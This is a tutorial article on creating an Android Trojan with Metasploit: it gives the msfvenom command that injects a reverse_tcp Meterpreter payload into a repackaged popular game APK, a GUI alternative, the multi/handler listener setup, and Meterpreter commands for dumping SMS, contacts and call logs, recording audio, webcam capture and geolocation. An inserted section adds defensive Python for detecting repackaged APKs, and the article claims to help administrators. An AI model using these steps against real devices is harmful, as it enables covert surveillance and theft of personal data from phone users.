Metasploit: Android Session


Jarret W. Buse

In previous articles, I have covered how to access a Windows system as well as a Linux system. What if you wanted to gain access to the most widely used Operating System (OS)? In this article, I will cover the process of gaining access to an Android system, which includes tablets and phones.

Similar to the Linux Session article, this article will cover creating a Trojan to gain access to an Android system.

First, I will go over how to create the Trojan and secondly discuss how to get the Trojan onto the Android systems. For Network Administrators, you can learn how this process works and train your network users how to avoid getting Trojans. The result of getting a Trojan on an Android system is that others can gain access to your device. For phones, access allows the downloading of your contact list, text messages and a listing of phone calls sent and received.

To start, you need an existing Android Application Package (APK). Find one which seems to be popular and definitely requires network access. Usually, a game which accesses a server works well, though this is not required. Get the APK file and download it to your system. For this example, I will use “Angry Birds Rio”. APK files can be downloaded from and saved to your PC. Save the APK file in a folder that is easily accessible. In my example, I saved it to my Desktop (/home/jarret/Desktop/).

The command to run is “msfvenom -a dalvik --platform android -p android/meterpreter/reverse_tcp LHOST= LPORT=3333 -x /home/jarret/Desktop/Angry\ Birds\ Rio\ R -o /home/jarret/Desktop/Angry\ Birds\ Rio\”. Let's go over the parameters so you understand how it works.

The options are as follows:

  • -a – architecture of the system for the file being created (depends on platform)
    • sparc
    • x86
    • x86_64
    • armle
    • cbea
    • cbea64
    • dalvik
    • java
    • mipsbe
    • mipsle
    • ppc
    • ppc64
    • cmd
    • tty
    • x64
  • --platform – platform of the target system
    • AIX
    • Android
    • BSD
    • BSDi
    • Firefox
    • Java
    • Linux
    • Netware
    • NodeJS
    • OSX
    • PHP
    • Python
    • Ruby
    • Solaris
    • UNIX
    • Windows
  • -p – payload to use against the target
  • -x – template to use
  • -o – output folder and file
  • R – format of the output file (raw)

NOTE: Be sure to set the LHOST and LPORT correctly. The LHOST IP Address is the system on which Meterpreter will be running and listening for the Android device. The LPORT is the specific port on which the device will contact the LHOST. Make a note of these two values; the listener must be configured with exactly the same ones later.

Once the command completes, you should have a new APK file. Now, you need to get the APK file to the user of the Android device to be placed onto the device. Once the APK file is installed and run, the Meterpreter system should be listening.

NOTE: Be aware that a virus scanner such as Avira can detect the Trojan APK file.

Before moving on to starting Metasploit, let's look at another method of creating the Trojan in a Graphical User Interface (GUI). Open your browser and connect to the Meterpreter system and the port specified during installation. The default port is 3790. On my system, I connect to and log in using the account created when Metasploit was installed. Once logged in, I can choose the icon for “Payload Generator” as shown in Figure 1.

Figure 1.jpg


When the “Payload Generator” starts, select “Classic Payload” at the top of the window. Specify the “Platform” as Android and notice that the “Architecture” option disappears. The architecture for Android is Dalvik, and since it is the only option, it does not need to be selected. The “Stager” is set up as “reverse_tcp” with the stage set as “android/meterpreter”. Set your LHOST and LPORT for the meterpreter session as needed. The options are shown in Figure 2.

Figure 2.jpg


Next, select the “Output Options” and set the type of output to “Raw Bytes” as shown in Figure 3. The APK file is not an executable file, but a compressed archive with installation instructions, similar to a “.deb” or “.rpm” file. Click “Generate” so the file can be created; you can then “download” the file and specify where to save it. Now, you need to get it onto the Android device and installed on it.

Figure 3.jpg
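Because an APK is just a zip archive, a network administrator who wants to check whether a package handed to a user is the vendor's build or a repackaged copy (as produced from a template with -x above) can inventory both archives and compare them. The following added example is not part of the article; it builds two small constructed stand-in APKs in memory and flags altered bytecode (classes.dex) or signing material (META-INF/), which a template-based repackaging necessarily changes.

```python
import hashlib
import io
import zipfile


def _make_apk(entries):
    """Build a minimal zip archive in memory (constructed stand-in for an APK)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in entries.items():
            z.writestr(name, data)
    return buf.getvalue()


# Constructed sample data: a vendor build and a copy whose code and signing
# certificate differ. Real files would be read with open(path, "rb").read().
ORIGINAL_APK = _make_apk({
    "AndroidManifest.xml": b"<manifest package='com.example.game'/>",
    "classes.dex": b"dex\n035original-bytecode",
    "res/layout/main.xml": b"<layout/>",
    "META-INF/CERT.RSA": b"vendor-signing-cert",
})
REPACKAGED_APK = _make_apk({
    "AndroidManifest.xml": b"<manifest package='com.example.game'/>",
    "classes.dex": b"dex\n035original-bytecode+injected-stage",
    "res/layout/main.xml": b"<layout/>",
    "META-INF/CERT.RSA": b"different-self-signed-cert",
})


def apk_inventory(apk_bytes):
    """Map every entry in the archive to the SHA-256 of its contents."""
    inv = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            inv[name] = hashlib.sha256(z.read(name)).hexdigest()
    return inv


def compare_apks(reference_bytes, suspect_bytes):
    """Report entries added, removed or altered relative to the reference APK."""
    ref, sus = apk_inventory(reference_bytes), apk_inventory(suspect_bytes)
    report = {
        "added": sorted(set(sus) - set(ref)),
        "removed": sorted(set(ref) - set(sus)),
        "changed": sorted(n for n in ref.keys() & sus.keys() if ref[n] != sus[n]),
    }
    # Bytecode or signing material that differs from the vendor build is the
    # hallmark of a repackaged APK; resources alone changing is less telling.
    report["suspicious"] = any(
        n.endswith(".dex") or n.startswith("META-INF/")
        for n in report["added"] + report["changed"]
    )
    return report
```

Comparing a user's copy against a reference obtained directly from the vendor is what makes the result meaningful; the suspect file alone cannot tell you what the original looked like.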


To start Meterpreter listening for the “infected” systems, perform the following:
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp
  • set LHOST
  • set LPORT 3333
  • exploit

NOTE: Since the handler being loaded lives under “multi”, it is not tied to a single Operating System (OS): Metasploit will listen for responses from any system or device, whatever its OS, that contacts the LHOST.

Metasploit should now be listening for a response from any Trojans that become active. Once the Target Host has created the session back to Metasploit, you can then start accessing the Android device.

The available commands which can be used in Meterpreter are as follows:

Core Commands

? - Help menu
background - Backgrounds the current session
bgkill - Kills a background meterpreter script
bglist - Lists running background scripts
bgrun - Executes a meterpreter script as a background thread
channel - Displays information about active channels
close - Closes a channel
disable_unicode_encoding - Disables encoding of unicode strings
enable_unicode_encoding - Enables encoding of unicode strings
exit - Terminate the meterpreter session
get_timeouts - Get the current session timeout values
help - Help menu
info - Displays information about a Post module
interact - Interacts with a channel
irb - Drop into irb scripting mode
load - Load one or more meterpreter extensions
machine_id - Get the MSF ID of the machine attached to the session
quit - Terminate the meterpreter session
read - Reads data from a channel
resource - Run the commands stored in a file
run - Executes a meterpreter script or Post module
set_timeouts - Set the current session timeout values
sleep - Force Meterpreter to go quiet, then re-establish session.
transport - Change the current transport mechanism
use - Deprecated alias for 'load'
uuid - Get the UUID for the current session
write - Writes data to a channel

Stdapi: File system Commands

cat - Read the contents of a file to the screen
cd - Change directory
download - Download a file or directory
edit - Edit a file
getlwd - Print local working directory
getwd - Print working directory
lcd - Change local working directory
lpwd - Print local working directory
ls - List files
mkdir - Make directory
pwd - Print working directory
rm - Delete the specified file
rmdir - Remove directory
search - Search for files
upload - Upload a file or directory

Stdapi: Networking Commands

ifconfig - Display interfaces
portfwd - Forward a local port to a remote service
route - View and modify the routing table

Stdapi: System Commands

execute - Execute a command
getuid - Get the user that the server is running as
ps - List running processes
shell - Drop into a system command shell
sysinfo - Gets information about the remote system, such as OS

Stdapi: Webcam Commands

record_mic - Record audio from the default microphone for X seconds
webcam_chat - Start a video chat
webcam_list - List webcams
webcam_snap - Take a snapshot from the specified webcam
webcam_stream - Play a video stream from the specified webcam

Android Commands

check_root - Check if device is rooted
dump_calllog - Get call log
dump_contacts - Get contacts list
dump_sms - Get SMS messages
geolocate - Get current lat-long using geolocation

Depending on the Android device, some commands may not work.

Try this out on an Android Device and see how simple it is to attack an Android Device and get data from the device.

NOTE: To find the Trojan app on the device, look for the installed program called “MainActivity” and uninstall it.
